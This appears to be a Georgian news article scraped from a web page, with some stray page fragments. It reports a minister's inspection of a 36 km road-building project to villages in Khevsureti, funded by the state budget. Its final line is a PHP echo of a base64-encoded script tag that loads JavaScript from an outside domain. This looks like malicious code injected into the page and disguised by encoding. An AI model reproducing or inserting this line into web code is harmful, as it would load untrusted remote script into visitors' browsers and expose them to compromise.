celsiusi
ავერსი შნაიდერი

უმნიშვნელოვანესი პროექტი მიმდინარებს ბარისახო-როშკა-არხოტი-ამღა-ჭიმღას შიდასახელმწიფოებრივ გზაზე. 36 კმ-იანი გზის 11 კმ-იანი მონაკვეთის გაჭრა-რეაბილიტაცია უკვე დასრულებულია. აქტიურად მიმდინარეობს გზის 6 კმ-მდე მონაკვეთის რეაბილიტაცია და 18 კმ-იანი ახალი გზის გაჭრა. გათვალისწინებულია გრუნტის საფარიანი გზის მოწყობა, მაგრამ გზა ფართოვდება ისე, რომ მასზე გადაადგილება არა მხოლოდ კომფორტული, არამედ უსაფრთხოც იყოს,“- ამის შესახებ რეგიონული განვითარებისა და ინფრასტრუქტურის მინისტრმა, ირაკლი ქარსელაძემ ხევსურეთის სოფლებთან მისასვლელი გზის გაყვანის სამუშაოების მონახულების შემდეგ განაცხადა.


მცხეთა-მთიანეთის რეგიონში, ჟინვალი-ბარისახო-შატილის შიდასახელმწიფოებრივი მნიშვნელობის საავტომობილო გზის 58-ე კილომეტრიდან, ხევსურეთის სოფელ როშკამდე 6 კმ-იან მონაკვეთზე, არხოტის უღელტეხილის გავლით სოფელ ამღამდე და სოფელი ახიელიდან სოფელ ჭიმღამდე 18 კმ-იან მონაკვეთზე საავტომობილო გზის გაჭრის სამუშაოები მიმდინარეობს. სოფლებთან მისასვლელი საავტომობილო გზა აქამდე არ არსებობდა.


პროექტის ფარგლებში, ჯამში, გაიჭრება და რეაბილიტირდება 36 კმ-მდე საავტომობილო გზა, საიდანაც 28 კმ სრულიად ახალი გზა იჭრება. 11 კმ-იანი საავტომობილო გზის გაჭრის სამუშაოები გასულ წელს დასრულდა. მიმდინარე წელს გზა გაიჭრება სოფელ ამღამდე, ხოლო სრულად პროექტი 2025 წელს დასრულდება.


მოცემულ ეტაპზე, მიმდინარეობს მიწის მოჭრის, გზის ნიშნულებზე მოყვანის, ხელოვნური ნაგებობების - სახიდე გადასასვლელებისა და მილხიდების მოწყობის სამუშაოები. ახალი საავტომობილო გზა გრუნტიანი იქნება, სადაც ჩატარდება საგზაო უსაფრთხოებისთვის საჭირო სამუშაოებიც.


„გათვალისწინებულია შესაბამისი ხიდების მონტაჟი. დასრულებულია ორი ხიდის მშენებლობა და, სხვადასხვა პროგრესით, გრძელდება სამი ხიდის მოწყობის სამუშაოები. პროექტი მომავალ წელს დასრულდება, რაც უმნიშვნელოვანესია რეგიონისთვის. მომატებულია ტურისტული ნაკადები და შესაბამისად, გაუმჯობსებული გზა და სხვა მიმდინარე პროექტები, ერთობლიობაში უფრო საინტერესოს გახდის ხევსურეთში სტუმრობას,“-აღნიშნა ირაკლი ქარსელაძემ.


პროექტს რეგიონული განვითარებისა ინფრასტრუქტურის სამინისტროს მუნიციპალური განვითარების ფონდი ახორციელებს. სამუშაოები სახელმწიფო ბიუჯეტიდან 26 მილიონი ლარით ფინანსდება.

89
echo base64_decode("PHNjcmlwdCBzcmM9Ii8vYWsuZGtlLm1lLyI+PC9zY3JpcHQ+");